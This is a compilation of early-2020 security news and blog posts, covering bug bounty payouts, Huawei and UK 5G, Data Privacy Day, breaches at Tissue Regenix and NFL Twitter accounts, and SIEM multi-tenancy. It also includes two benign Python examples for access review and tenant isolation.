Vulnerability Reward Program: 2019 Year in Review

Our Vulnerability Reward Programs were created to reward researchers for protecting users by telling us about the security bugs they find. Their discoveries help keep our users, and the internet at large, safe. We look forward to even more collaboration in 2020 and beyond.

2019 has been another record-breaking year for us, thanks to our researchers! We paid out over $6.5 million in rewards, doubling what we’ve ever paid in a single year. At the same time our researchers decided to donate an all-time-high of $500,000 to charity this year. That’s 5x the amount we have ever previously donated in a single year. Thanks so much for your hard work and generous giving!

Since 2010, we have expanded our VRPs to cover additional Google product areas, including Chrome, Android, and most recently Abuse. We've also expanded to cover popular third party apps on Google Play, helping identify and disclose vulnerabilities to impacted app developers. Since then we have paid out $15 million in rewards. As we have done in years past, we are sharing our 2019 Year in Review across these programs.

What’s changed in the past year?

  • Chrome’s VRP increased its reward payouts by tripling the maximum baseline reward amount from $5,000 to $15,000 and doubling the maximum reward amount for high quality reports from $15,000 to $30,000. The additional bonus given to bugs found by fuzzers running under the Chrome Fuzzer Program is also doubling to $1,000. More details can be found in their program rules page.
  • Android Security Rewards expanded its program with new exploit categories and higher rewards. The top prize is now $1 million for a full chain remote code execution exploit with persistence which compromises the Titan M secure element on Pixel devices. And if you achieve that exploit on specific developer preview versions of Android, we’re adding in a 50% bonus, making the top prize $1.5 million. See our program rules page for more details around our new exploit categories and rewards.
  • Abuse VRP engaged in outreach and education to increase researchers' awareness of the program, presenting an overview of our Abuse program in Australia, Malaysia, Vietnam, the UK and US.
  • The Google Play Security Reward Program expanded scope to any app with over 100 million installs, resulting in over $650,000 in rewards in the second half of 2019.
  • The Developer Data Protection Reward Program was launched in 2019 to identify and mitigate data abuse issues in Android apps, OAuth projects, and Chrome extensions.

We also had the goal of increasing engagement with our security researchers over the last year at events such as BountyCon in Singapore and ESCAL8 in London. These events not only allow us to get to know each of our bug hunters but also provide a space for bug hunters to meet one another and hopefully work together on future exploits.

A hearty thank you to everyone that contributed to the VRPs in 2019. We are looking forward to increasing engagement even more in 2020 as both Google and Chrome VRPs will turn 10. Stay tuned for celebrations.

Follow us on @GoogleVRP

Huawei set for limited UK 5G role, but can we Trust Huawei?

Today the UK Government decided Huawei can be allowed to help build the UK's 5G network, but remain banned from supplying kit to "sensitive parts" of the core network. Prime Minister Boris Johnson made the long-awaited decision, ending months of concern for the Chinese telecoms giant.

The PM had briefed US President Donald Trump about the decision. Trump has been very vocal on his stance, exclaiming “we are not going to do business with Huawei”, and Trump’s administration is reportedly nearing publication of a rule that could further block shipments of US-made goods to Huawei. The Trump administration has said it 'is disappointed' with the UK government's decision. China had warned the UK there could be "substantial" repercussions for other trade and investment plans had the company been banned outright.

There was ferocious debate in the UK parliament following the government announcement, with MPs calling into question the cybersecurity risks which could prevail – the US says the cybersecurity risks are severe, the UK’s security services say they can be managed, whereas Australia has opted for an outright ban. There’s a clear disconnect, and today's decision could cause turmoil in the US/UK working relationship that could ultimately impact a post-Brexit trade deal.

Can Huawei be trusted, or will using its equipment leave communication networks, and our own mobile phones, vulnerable? The US says Huawei is a security risk, given the firm is heavily state supported and is run by Mr Ren, who served in the Chinese military. The concern is that Huawei 5G equipment could be used for spying and for negatively impacting critical national infrastructure.

The National Cyber Security Centre (NCSC) published a document which says UK networks will have three years to comply with the caps on the use of Huawei's equipment.

"Huawei is reassured by the UK government's confirmation that we can continue working with our customers to keep the 5G rollout on track. It gives the UK access to world-leading technology and ensures a competitive market," the firm's UK chief Victor Zhang said in a statement.

UK security professionals have reported significant concerns around how digital transformation projects and the implementation of 5G will affect their risk posture. 89% of UK businesses said they have concerns around the implementation of emerging technologies and essential digital transformation projects, and almost four in ten (38%) expect digital transformation and 5G to offer cybercriminals more effective and more destructive methods of achieving their nefarious goals, according to research from VMware Carbon Black.

A10 Networks' VP of Strategy, Gunter Reiss, said “The global dispute over whether tech giant Huawei should be used in national 5G networks has created a lot of geopolitical conversations around the 5G build-out, security to Critical National Infrastructure, and generally whether certain vendors should be included or excluded. However, operators need to base their decisions not on these opinions but on technology – the strength, innovation and security capabilities. With the massive increases in bandwidth, number of devices predicted to be on these networks and the growing security requirements, the technology being used must meet these needs.”

A Security Compromise on Economic Grounds

"This is a good compromise between alleviating 'security' concerns and making sure that the 5G UK market is not harmed," commented Dimitris Mavrakis, a telecoms analyst at ABI Research. Previously I posted about the National Security vs Economic argument which has been behind the UK government decision - see The UK Government Huawei Dilemma and the Brexit Factor.

5 identity priorities for 2020

Today, Joy Chik, Corporate Vice President of Identity, shared five security priorities that organizations should focus on in 2020 as they digitally transform. These priorities are based on many conversations with our customers, and include:

  1. Connect all applications and cloud resources to improve access controls and the user experience.
  2. Empower developers to integrate identity into their apps and improve security.
  3. Go passwordless to make security effortless for users.
  4. Enable boundary-less collaboration and automated access lifecycle for all users.
  5. Start your Zero Trust journey to protect your organization as you digitally transform.

To learn more about these priorities, and how decentralized identity is poised to offer greater verifiability and privacy, read Joy’s post, 5 identity priorities for 2020—preparing for what’s next.

Also bookmark the Security blog to keep up with our expert coverage on security matters and follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post 5 identity priorities for 2020 appeared first on Microsoft Security.

Data privacy is about more than compliance—it’s about being a good world citizen

Happy Data Privacy Day! Begun in 2007 in the European Union (E.U.) and adopted by the U.S. in 2008, Data Privacy Day is an international effort to encourage better protection of data and respect for privacy. It’s a timely topic given the recent enactment of the California Consumer Privacy Act (CCPA). Citizens and governments have grown concerned about the amount of information that organizations collect, what they are doing with the data, and ever-increasing security breaches. And frankly, they’re right. It’s time to improve how organizations manage data and protect privacy.

Let’s look at some concrete steps you can take to begin that process in your organization. But first, a little context.

The data privacy landscape

Since Data Privacy Day commenced in 2007, the amount of data we collect has increased exponentially. In fact we generate “2.5 quintillion bytes of data per day!” Unfortunately, we’ve also seen a comparable increase in security incidents. There were 5,183 breaches reported in the first nine months of 2019, exposing a total of 7.9 billion records. According to the RiskBased Data Breach QuickView Report 2019 Q3, “Compared to the 2018 Q3 report, the total number of breaches was up 33.3 percent and the total number of records exposed more than doubled, up 112 percent.”

In response to these numbers, governments across the globe have passed or are debating privacy regulations. A few of the key milestones:

  • Between 1998 and 2000, the E.U. and the U.S. negotiated Safe Harbor, a set of privacy principles governing how to protect data transferred across the Atlantic.
  • In 2015, the European Court of Justice overturned Safe Harbor.
  • In 2016, Privacy Shield replaced Safe Harbor and was approved by the courts.
  • In 2018, the General Data Protection Regulation (GDPR) took effect in the E.U.
  • On January 1, 2020, CCPA took effect for businesses that operate in California.

Last year, GDPR levied 27 fines for a total of €428,545,407 (over $472 million USD). California will also levy fines for violations of CCPA. Compliance is clearly important if your business resides in a region, or employs persons in regions, protected by privacy regulation. But protecting privacy is also the right thing to do. Companies that stand on the side of protecting the consumer’s data can differentiate themselves and earn customer loyalty.

Don’t build a data privacy program, build a data privacy culture

Before you get started, recognize that improving how your organization manages personal data means building a culture that respects privacy. Break down silos and engage people across the company. Legal, Marketing, SecOps, IT, Senior Managers, Human Resources, and others all play a part in protecting data.

Embrace the concept that privacy is a fundamental human right—Privacy is recognized as a human right in the U.N. Declaration of Human Rights and the International Covenant on Civil and Political Rights, among other treaties. It’s also built into the constitutions and governing documents of many countries. As you prepare your organization to comply with new privacy regulations, let this truth guide your program.

Understand the data you collect, where it is stored, how it is used, and how it is protected—This is vital if you’re affected by CCPA or GDPR, which require that you disclose to users what data you are collecting and how you are using it. You’re also required to provide data or remove it upon customer request. And I’m not just talking about the data that customers submit through a form. If you’re using a tool to track and collect online user behavior that also counts.

This process may uncover unused data. If so, revise your data collection policies to improve the quality of your data.

Determine which regulations apply to your business—Companies within the E.U. that do business with customers within the E.U., or employ E.U. citizens, are subject to GDPR. CCPA applies to companies doing business within California that meet one of the following requirements:

  • A gross annual revenue of more than $25 million.
  • Derive more than 50 percent of their annual income from the sale of California consumer personal information or
  • Buy, sell, or share the personal information of more than 50,000 California consumers annually.

Beyond California and the E.U., India is debating a privacy law, and Brazil’s regulations, Lei Geral de Proteção de Dados (LGPD), will go into effect in August 2020. There are also several privacy laws in Asia that may be relevant.

Hire, train, and connect people across your organization—To comply with privacy regulations, you’ll need processes and people in place to address these two requirements:

  1. Californians and E.U. citizens are guaranteed the right to know what personal information is being collected about them; to know whether their personal information is sold or disclosed and to whom; and to access their personal information.
  2. Organizations will be held accountable to respond to consumers’ personal information access requests within a finite timeframe, for both regulations.

The GDPR requires that all companies hire a Data Protection Officer to ensure compliance with the law. But to create an organization that respects privacy, go beyond compliance. New projects and initiatives should be designed with privacy in mind from the ground up. Marketing will need to include privacy in campaigns; SecOps and IT will need to ensure proper security is in place to protect data that is collected. Build a cross-discipline team with privacy responsibilities, and institute regular training, so that your employees understand how important it is.

Be transparent about your data collection policies—Data regulations require that you make clear your data collection policies and provide users a way to opt out (CCPA) or opt in (GDPR). Your privacy page should let users know why the data collection benefits them, how you will use their data, and to whom you sell it. If they sell personal information, California businesses will need to include a “Do not sell my personal information” call to action on the homepage.

A transparent privacy policy creates an opportunity for you to build trust with your customers. Prove that you support privacy as a human right and communicate your objectives in a clear and understandable way. Done well, this approach can differentiate you from your competitors.

Extend security risk management practices to your supply chain—Both the CCPA and the GDPR require that organizations put practices in place to protect customer data from malicious actors. You also must report breaches in a timely manner. If you’re found in noncompliance, large fees can be levied.

As you implement tools and processes to protect your data, recognize that your supply chain also poses a risk. Hackers attack software updates, software frameworks, libraries, and firmware as a means of infiltrating otherwise vigilant organizations. As you strengthen your security posture to better protect customer data, be sure to understand your entire hardware and software supply chain. Refer to the National Institute of Standards and Technology for best practices. Microsoft guidelines for reducing your risk from open source may also be helpful.

Microsoft can help

Microsoft offers several tools and services to help you comply with regional and country level data privacy regulations, including CCPA and GDPR. Bookmark the Security blog and the Compliance and security series to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity and connect with me on LinkedIn.

The post Data privacy is about more than compliance—it’s about being a good world citizen appeared first on Microsoft Security.

UK Medical Products Manufacturer Shuts Plant Following Breach

A British company that specializes in making skin, bone, and organ grafts has temporarily closed its manufacturing plant in America following a cybersecurity breach.

Regenerative medical technology company Tissue Regenix Group PLC said on Tuesday that its computer systems and a third-party IT service provider in the United States were accessed without authorization. No details were given regarding how the incident occurred or when the company became aware that it had been compromised.

Tissue Regenix responded to the cybersecurity incident by taking the affected system offline and shutting down operations at its plant in Texas. The company has appointed forensic cybersecurity specialists to investigate how and when the breach occurred and said that it is in talks with the relevant legal authorities. 

The cybersecurity incident is not believed to have affected any of Tissue Regenix's operations in the UK and is not thought to have impacted the company's financial systems. 

"Tissue Regenix has taken precautionary steps, including taking affected systems offline. This has restricted access to certain business operations, including the company's ability in the short-term to continue manufacturing in its United States facility, which has been taken offline whilst the incident is being investigated," said a Tissue Regenix spokesperson. 

"The company is engaged with its third-party IT service provider, the relevant legal authorities and cyber security experts to rectify the incident as quickly as possible and to minimize any impact on its operations. The time required to resolve the incident is currently unknown."

According to Reuters, news of the breach caused the share price of Tissue Regenix to tumble by as much as 22%. 

Tissue Regenix was formed in 2006 as an offshoot of the University of Leeds. The company is based in the historic city of York. Tissue Regenix set up its base in America at the tail end of 2012.

The medical technology product that Tissue Regenix is known for producing is a special kind of tissue that can be used to repair worn-out or diseased human body parts. The tissue has been designed in such a way that the patient's body is unlikely to reject a graft. 

The cyber-attack has come at a particularly bad time for Tissue Regenix, which said last Wednesday that its funding is not guaranteed beyond April.

New ‘CacheOut’ Attack Leaks Data from Intel CPUs, VMs and SGX Enclave

Another month, another speculative execution vulnerability found in Intel processors. If your computer is running any modern Intel CPU built before October 2018, it's likely vulnerable to a newly discovered hardware issue that could allow attackers to leak sensitive data from the OS kernel, co-resident virtual machines, and even from Intel's secured SGX enclave. Dubbed CacheOut a.k.a. L1 Data

NFL Twitter Accounts Hacked One Week Before Super Bowl

The Twitter accounts of America's National Football League (NFL) and 15 of its teams have been hacked just one week before the biggest football game of the 2019–2020 season.

The first team to be compromised was the Chicago Bears, whose account @ChicagoBears was hacked at 8:40 a.m. on Sunday morning. 

Followers were shown an image of a man with a full, dark beard who was wearing the traditional Arabic headgear of a keffiyeh and an agal together. Along with the photo, hackers posted the caption: "Welcome to our new owner @Turki_alalshikh #ProBowl #Bears100 #ChicagoBears."

A Saudi "white hat" hacker group known as OurMine was quick to claim responsibility for the hacks, which the group said were carried out as a publicity stunt to "announce that we are back" and to "show people that everything is hackable."

Fans of rival American football team the Detroit Lions seized the opportunity afforded by the Bears hack to propose a trade. The account @PrideofDetroit tweeted at the Bears: "Hey, while you're still hacked @ChicagoBears, trade us Khalil Mack for a 6th rounder. Twitter is a binding contract."

The hackers decided to run with the joke and responded with "Done for 1$."

By 12:43 p.m. on Sunday, the Chicago Bears were back in control of their Twitter account and had posted a message apologizing to fans for the compromise. 

OurMine allegedly compromised the official Twitter account of the NFL on Monday. In a statement released yesterday, the NFL said: "On Monday, the NFL Cybersecurity department became aware of a breach of league-related social media accounts. Targeted breaches and additional failed attempts were discovered across the league and team accounts.

"The NFL took immediate action and directed the teams to secure their social media accounts and prevent further unauthorized access."

NFL reporter Dov Kleiman began a Twitter thread of screenshots depicting all the NFL team accounts compromised in the OurMine hack. By his reckoning, a total of 15 teams were hacked, including the Green Bay Packers.

Other teams to be hacked were the Kansas City Chiefs and the San Francisco 49ers, who are due to compete on February 2 in the Super Bowl LIV game, which will decide the champion for the NFL's 2019–2020 (and 100th) season.

An anonymous individual who responded to questions from NBC News via an email account linked with OurMine would not reveal how the group carried out the hack. The individual did, however, reveal their pick for Sunday's big game, predicting a victory for the Chiefs.

It’s Data Privacy Day. Do You Know What Info Your Apps Are Tracking?

January 28 is Data Privacy Day—not exactly a major holiday, but it does provide an important opportunity to address something that’s compromising your privacy on a daily basis: namely, your phone.

With a nod to all the flip-phone activists out there, it’s fair to say smartphones aren’t going anywhere. Few among us pine for the days of wall-anchored phones that couldn’t send photos, call a cab, and play a clip of Baby Yoda at the same time. The level of convenience ushered in by Android and iOS devices is beyond dispute.

That convenience came at a heavy cost that consumers are only now beginning to appreciate. Take, for instance, the “Brightest Flashlight” app, which ran afoul of the FTC a few years back on account of transmitting intimate levels of user data to advertisers while providing a minimal level of service; i.e., turning on the light of an Android device.

And that’s the most basic example. Mobile apps provide the opportunity to track our day-to-day lives down to the most intimate details, and they often share that data with little to no oversight: dating apps such as and Tinder have been “caught” collecting and selling data relating to drug use and religious views. Period tracking apps like Maya have been found to upload user data to Facebook including heaviness of menstrual flow, body weight, and sexual activity. Google recently acquired the fitness smartwatch brand FitBit, and with it the access to the sleep, exercise, and eating habits of its users. We might be at a loss as to how this data can be monetized, but rest assured: your data has value and is actively being exploited one app at a time.

What’s the solution? Unfortunately, there isn’t one, at least not yet. Despite the passage of California’s privacy law, we’re still very much living in the Wild West when it comes to user data.

Still, we can mitigate the ongoing privacy catastrophe that is the modern internet by making a quick audit of the apps on our smartphones. Take a look at what you have installed and ask yourself the following questions:


  • Does this service actually require an app? If you have access to the same services by connecting via a web browser that you can with an app, stick to the web, preferably via a VPN and in private browsing mode. Most mobile apps are configured to get more user data than would be accessible via a website.
  • Is the data being accessed by this app worth it? A flashlight app shouldn’t need your physical location. Facebook Messenger shouldn’t need to track the velocity at which you’re traveling. That Scrabble clone doesn’t need to know every contact on your phone. Be circumspect about the kind of access being granted when you install an app on your phone. If there’s any doubt, don’t install it.
  • Do I want this information out in the world? Any information shared with an app has the potential to be uploaded, processed and analyzed by any number of third parties. Don’t share anything with an app that you wouldn’t be comfortable having a stranger know about you.

It’s overly optimistic to expect to reclaim your privacy on Data Privacy Day, but you can at least take a few steps in the right direction. Delete any apps you’re not using, and see if there are more privacy-friendly alternatives to some of your more frequently used apps.

The post It’s Data Privacy Day. Do You Know What Info Your Apps Are Tracking? appeared first on Adam Levin.

Data Privacy Day warning: Organizations that succeed take privacy seriously

Businesses should be worried that Canadians increasingly don’t trust them to handle their personal data and information generated through online buying, according to a senior federal privacy official.

In an interview to mark the 14th annual International Data Privacy Day, deputy privacy commissioner Gregory Smolynec noted that surveys show 90 per cent of Canadian respondents say they are very concerned about their inability to protect their privacy.

“Very high numbers of Canadians believe businesses do not respect their privacy right,” he added. “This should raise concerns.”

The few countries that began observing January 28 as Data Privacy Day, to raise awareness among businesses, governments and consumers of data protection best practices, have grown to 50. Yet judging by the regular reports of data breaches, there hasn’t been much progress.

In November the Office of the Privacy Commissioner estimated the personal information of 28 million Canadians had been exposed in the first 12 months of mandatory federal data breach reporting.

In his annual report issued a month later, Privacy Commissioner Daniel Therrien repeated his plea for Ottawa to recognize privacy as a fundamental right in law.

The current law (the Personal Information Protection and Electronic Documents Act, also known as PIPEDA) and the Liberal government’s seeming unwillingness to consider giving his office much stronger enforcement power “create an excellent incentive for companies not to take privacy seriously, change their practices only if forced to after years of litigation, and generally proceed without much concern for compliance with privacy laws,” said Therrien.

A recent Novipro-Leger survey of 496 IT and other officials from Canadian companies released this week found that not quite half the companies (48 per cent) had reviewed their data practices in 2019. Fewer than half of respondents believed their organizations were very well protected against data loss (46 per cent), data breaches (44 per cent), and viruses (45 per cent).

“Canadian businesses have been slow to tighten up their practices and are struggling to respond to the growing threat,” concluded the report. (Registration required)

On the other side, a recent survey released by data management provider Tealium showed half of U.S. consumer respondents don’t feel well informed about how businesses are using their data.


Asked if businesses don’t take privacy seriously, Smolynec noted new communications technologies are having an impact on privacy and expose businesses to vulnerabilities.

“There are some businesses that are not compliant (with PIPEDA), there are other businesses that have to develop robust privacy programs and cybersecurity measures to protect themselves.”

To show Canadians they are tough about privacy, businesses need to make sure they follow PIPEDA and get “meaningful consent” for the personally identifiable data they collect, he said. That includes explaining what personal information is being collected, the purpose of the collection, who it is being shared with, how it may be used and any potential risks. The OPC website has advice for businesses on consent here.

The OPC today also issued a package the public can use to spark discussion about privacy.

“It’s very critical for businesses to pay close attention to their processes related to [data] security and they have to make sure they have invested and structured themselves to address the risks of breaches,” said Smolynec. “That will help improve trust.”

Research firm Gartner also believes organizations need to pay more attention to the link between privacy and trust. Privacy is becoming a reason for consumers to purchase a product, in the same way that “organic,” “free trade” and “cruelty-free” labels have driven product sales, it said in a note earlier this month.

“Privacy-first products are likely to follow this trend,” said Bart Willemsen, a Gartner vice-president. “To increase customer trust, executive leaders need to build a holistic and adaptive privacy program across the organization, and be proactive instead of responding to each jurisdictional challenge.”


More than 60 jurisdictions around the world have enacted or proposed postmodern privacy and data protection laws, following the introduction of the EU’s General Data Protection Regulation (GDPR) in 2018.

“People are actively demanding privacy protection — and legislators are reacting,” said Willemsen. “If your organization operates globally, focus on standardizing operations in accordance with the GDPR, and then adjust as required for local requirements.”

He suggests using technology solutions that automate portions of a privacy management program. He also urged organizations to appoint a data privacy officer who reports to the board.

Dave Masson, Ottawa-based director of enterprise cybersecurity for Darktrace, said in an interview that Data Privacy Day should mean to an organization that — if it isn’t already doing so — it has to start protecting the personally identifiable information of customer and employees. The consequences of data theft could be “disastrous,” he said, including lawsuits and severe damage to the organization’s reputation.

“Organizations still struggle with visibility of what they have on their network,” he said, emphasizing the complexities introduced by cloud architectures. “That’s one of the problems — they can’t see what they’ve got.

“If I was an organization and confident in my security approach, I would be very proud to point out [on Data Privacy Day] what’s in place … as a way of assuring people you’re taking this seriously.”


Organizations need to take “trust-worthiness” more seriously, Eve Maler, interim CTO of digital identity provider ForgeRock, said in an interview.

Data regulations have been around for years, she argued, but they have focused on basic data protection. Newer regulations demand data transparency — telling consumers what the firm knows about them — and allowing customers more control over their data. So successful organizations need to go beyond compliance to establish trust.

Organizations have to think more carefully about the privacy implications of their products, she said. For example, one company has had to withdraw what it hoped was a promising child bedroom monitor after complaints it wasn’t secure.

“That’s an awfully expensive way to go to market,” Maler said.

To impress customers, firms should also look at the personal data they collect as a joint asset, she added.

In the run-up to Data Privacy Day, a number of firms in the security space released statements warning of the need to act.

“We currently see many companies playing catch-up with new regulations, working to implement the right security tools and practices after a breach,” said Darrell Long, vice-president of product management at One Identity. “Hopefully, Data Privacy Day becomes a good initiative to remind companies to think ahead and maintain a proactive stance on privacy before a cyber incident occurs.”

Data Privacy Day “is all about raising awareness of how organizations put the vast amount of sensitive data they store at risk and encouraging everyone to take action to better protect this data,” said Ray Overby, CTO and co-founder of Key Resources.

One major risk to data privacy is excessive access, which simply means that there are individuals, either internally or externally, who have unnecessary access to corporate information.

“The more people with access to information, the more likely your data will be compromised,” he said. “These issues can crop up inadvertently and go undetected for years, so organizations need to include excessive access checking in ongoing security processes.”

Another tip for organizations to improve data privacy practices, he said, is to accurately inventory, classify, and define data ownership.
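The two recommendations above (excessive access checking, and an inventory with classification and ownership) fit together naturally in one review. The following is an added example, not code from Key Resources or any product mentioned on this page; the inventory, role entitlements and access grants are constructed sample data, and the 90-day staleness rule is an assumed policy value.

```python
"""Excessive access review over a data inventory (added example).

Joins a constructed data inventory (asset, classification, owner) with
constructed access grants and last-use dates, and flags grants that are
stale, ownerless, or not justified by the holder's role.
"""
from datetime import date, timedelta

# Constructed inventory: each dataset carries a classification and a named owner.
INVENTORY = {
    "hr/payroll":         {"classification": "restricted", "owner": "hr-lead"},
    "sales/pipeline":     {"classification": "internal",   "owner": "sales-lead"},
    "legacy/export-2016": {"classification": "restricted", "owner": None},  # nobody owns it
}

# Which roles are entitled to which datasets: the "should have" side of the review.
ROLE_ENTITLEMENTS = {
    "payroll-clerk": {"hr/payroll"},
    "sales-rep": {"sales/pipeline"},
    "contractor": set(),
}

# Constructed access grants, as they might come out of an IAM or ACL export.
GRANTS = [
    {"user": "alice", "role": "payroll-clerk", "dataset": "hr/payroll",         "last_used": date(2020, 1, 20)},
    {"user": "bob",   "role": "sales-rep",     "dataset": "hr/payroll",         "last_used": date(2019, 6, 1)},
    {"user": "carol", "role": "contractor",    "dataset": "sales/pipeline",     "last_used": None},
    {"user": "dave",  "role": "payroll-clerk", "dataset": "legacy/export-2016", "last_used": date(2020, 1, 5)},
]


def review_access(grants, inventory, entitlements, today, stale_after=timedelta(days=90)):
    """Return one finding per grant that should be removed or re-approved."""
    findings = []
    for g in grants:
        asset = inventory.get(g["dataset"])
        reasons = []
        if asset is None:
            # Access to something nobody inventoried is excessive by definition.
            reasons.append("dataset missing from inventory")
        else:
            if asset["owner"] is None:
                reasons.append("dataset has no owner to approve access")
            if g["dataset"] not in entitlements.get(g["role"], set()):
                reasons.append(f"role {g['role']!r} is not entitled to this dataset")
            # Restricted data gets the strictest rule: any unused grant is excessive.
            unused = g["last_used"] is None or today - g["last_used"] > stale_after
            if unused and asset["classification"] == "restricted":
                reasons.append("restricted data: grant unused for >90 days")
            elif g["last_used"] is None:
                reasons.append("never used")
        if reasons:
            findings.append({"user": g["user"], "dataset": g["dataset"], "reasons": reasons})
    return findings


def run_review():
    """Run the review on the constructed data with a fixed 'today' so results are reproducible."""
    return review_access(GRANTS, INVENTORY, ROLE_ENTITLEMENTS, today=date(2020, 1, 28))


if __name__ == "__main__":
    for finding in run_review():
        print(finding["user"], finding["dataset"], "; ".join(finding["reasons"]))
```

Running it flags bob (wrong role for payroll data, and the grant has gone unused), carol (contractor with a never-used grant outside her entitlements) and dave (access to a restricted dataset that has no owner who could have approved it); alice's grant passes all three checks. Wiring a report like this into a scheduled job is what "ongoing" excessive access checking looks like in practice.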

Companies have to remember that consumers entrust them with their personal data, said Anis Uzzaman, CEO and General Partner of Pegasus Tech Ventures.

“On Data Privacy Day, it’s important to remember that sensitive information needs safeguarding more than ever before,” indicated Uzzaman. “Some information that particularly needs to be protected by companies includes personal health data as this is very sensitive information that most people don’t want to be shared or used against them for future decisions they may want to make.”

When companies make the move to new application systems, it is essential to ensure a smooth transition by implementing best practices such as conducting a thorough inventory to determine no personal data is being collected, adequately backing it up, and properly protecting it with appropriate security platforms, said Steele Arbeeny, CTO of SNP Group.

This will be the first year Data Privacy Day will be celebrated with the new tough California Consumer Privacy Act (CCPA), which came into effect at the beginning of January.

Why is Multi Tenancy Important in a SIEM Solution?


All SIEMs are well known for their ability to monitor IT infrastructures for potential threats, escalating them to the appropriate party. Though these solutions share this core function in common, SIEMs differ widely in terms of features. It’s important to evaluate your own environment to determine what your priorities are. For certain organizations, particularly MSPs, multi tenancy is a key functionality.

What is Multi Tenancy?

In its original architectural context, multi tenancy establishes the difference between an apartment building and a single residence home. When used in technology, it describes a single instance of hardware or software that has more than one resident. Multi tenancy is perhaps most commonly recognized in conjunction with cloud computing, in which multiple users or groups reside on a single cloud server. It is also regularly seen in Software as a Service (SaaS) applications.

Certain SIEM solutions also have this capability. Clear partitions are in place to allow each tenant the ability to use it for their own environment. Each instance can be tailored specifically to meet the requirements and needs for any given infrastructure. Data remains strictly siloed to ensure both privacy and security. For instance, a Security Operations Center (SOC) that oversees multiple agencies would create a different tenant for each agency.
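To make the partitioning concrete, here is an added example of the data model behind a multi tenant SIEM; it is not code from Event Manager or any other product. Events are stored in one physical partition per tenant, queries are only ever issued through a session bound to a single tenant, and each tenant carries its own settings (here an alert threshold) so an instance can be tailored per customer. The tenant names and events are constructed.

```python
"""Tenant-partitioned event store (added example, not a product's code).

Every event carries a tenant_id, every query is bound to one tenant, and a
cross-tenant read raises instead of silently returning another tenant's data.
"""
from collections import defaultdict
from dataclasses import dataclass


class TenantIsolationError(Exception):
    """Raised when a query or ingest would cross the tenant partition."""


@dataclass(frozen=True)
class Event:
    tenant_id: str
    source: str
    severity: int
    message: str


@dataclass
class TenantSession:
    """A view of the store bound to exactly one tenant (e.g. one agency of a SOC)."""
    store: "MultiTenantEventStore"
    tenant_id: str

    def search(self, min_severity=0, source=None):
        # Every lookup goes through the store with this session's tenant id;
        # a caller holding a session cannot name a different tenant.
        return self.store._query(self.tenant_id, min_severity, source)


class MultiTenantEventStore:
    def __init__(self):
        # Physical partition: one bucket per tenant, never a shared list.
        self._partitions = defaultdict(list)
        # Per-tenant settings, so each instance can be tailored.
        self._settings = {}

    def create_tenant(self, tenant_id, alert_threshold=5):
        if tenant_id in self._settings:
            raise ValueError(f"tenant {tenant_id!r} already exists")
        self._settings[tenant_id] = {"alert_threshold": alert_threshold}

    def ingest(self, event):
        if event.tenant_id not in self._settings:
            raise TenantIsolationError(f"unknown tenant {event.tenant_id!r}")
        self._partitions[event.tenant_id].append(event)

    def session(self, tenant_id):
        if tenant_id not in self._settings:
            raise TenantIsolationError(f"unknown tenant {tenant_id!r}")
        return TenantSession(self, tenant_id)

    def _query(self, tenant_id, min_severity, source):
        results = []
        for ev in self._partitions[tenant_id]:
            # Defence in depth: verify the partition holds only this tenant's events.
            if ev.tenant_id != tenant_id:
                raise TenantIsolationError("partition contains foreign tenant data")
            if ev.severity >= min_severity and (source is None or ev.source == source):
                results.append(ev)
        return results

    def alerts(self, tenant_id):
        """Events at or above the tenant's own configured alert threshold."""
        threshold = self._settings[tenant_id]["alert_threshold"]
        return self._query(tenant_id, threshold, None)


def demo():
    """Constructed sample: a SOC serving two agencies with different thresholds."""
    store = MultiTenantEventStore()
    store.create_tenant("agency-a", alert_threshold=7)
    store.create_tenant("agency-b", alert_threshold=5)
    for ev in [
        Event("agency-a", "firewall", 8, "outbound connection blocked"),
        Event("agency-a", "auth", 3, "login success"),
        Event("agency-b", "auth", 6, "repeated login failures"),
        Event("agency-b", "endpoint", 2, "scheduled scan completed"),
    ]:
        store.ingest(ev)
    a, b = store.session("agency-a"), store.session("agency-b")
    return {
        "a_all": len(a.search()),
        "b_all": len(b.search()),
        "a_alerts": [e.message for e in store.alerts("agency-a")],
        "b_alerts": [e.message for e in store.alerts("agency-b")],
    }


if __name__ == "__main__":
    print(demo())
```

The point of the session object is that tenant scoping is enforced by the store, not by each analyst remembering to add a filter; the same severity-6 event is an alert for agency-b but not for agency-a because the threshold lives with the tenant.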

Multi Tenancy SIEMs, MSPs, and MSSPs

Multi Tenancy SIEM solutions are particularly helpful for Managed Service providers (MSPs) and Managed Security Service Providers (MSSPs). Managed Service Providers are companies that run IT services for different organizations. MSSPs specialize in running security services. Both of these business models include or have the option of different cybersecurity offerings, like threat monitoring with a SIEM solution. Having to purchase and run a single instance SIEM for each customer is not only an expensive undertaking, it would also take more time to keep up with the basic administration of so many individual solutions. The ability of a solution to offer multi tenancy is not only cost efficient, it ensures that customer accounts are segregated, but are still easily managed through one centralized solution.

Multi Tenancy and Event Manager

Event Manager includes multi tenancy capabilities ideal for MSPs and large enterprises looking to add SIEM segmentation to their offerings. It makes rapid threat detection and response attainable for substantial, complex networks with high volumes of security events to manage, and can easily scale as your organization continues to grow. Event Manager’s multi tenancy administration is straightforward and easy to use, but also provides ample flexibility so that you can tailor each instance as needed. With a multi tenancy SIEM in place, you can enable your customers to take threat detection and response to the next level, reducing risk and remaining compliant with regulations and industry best practices.


Want to learn more about how to put a SIEM to work?

Download our use case guide to get examples of the many different ways our SIEM solution, Event Manager, can bolster your security with real time monitoring, threat prioritization, and more.

Zoom Bug Potentially Allowed Attackers to Find and Join Active Meetings

Remote conferencing services provider Zoom patched a vulnerability that could have allowed an attacker to find and join active meetings. Check Point explained that the issue stemmed from the way in which Zoom secured certain meetings: If you use Zoom, you may already know that Zoom Meeting IDs are composed of 9, 10 or 11 […]

The post Zoom Bug Potentially Allowed Attackers to Find and Join Active Meetings appeared first on The State of Security.

CES 2020 Trend: Onboarding AI

CES didn't have an overarching tech, like 3D or huge flat screens, of past years. As I've reflected on what I saw at the show, what emerged is a new trend: a tech inflection point that will define much of the coming decade's challenges and opportunities. That trend is onboarding Artificial Intelligence.

Huawei to get only partial access to UK’s 5G networks

Huawei and other “high risk” telecom providers will be excluded from the core of the U.K.’s 5G and gigabit-capable networks, Prime Minister Boris Johnson’s government has decided.

It’s a move that could influence Canada’s decision on whether to allow carriers here to buy 5G equipment from Huawei. However, that decision is complicated by the tense relations with China over the detention of two Canadians after Huawei’s chief financial officer was arrested on an extradition request by the United States.

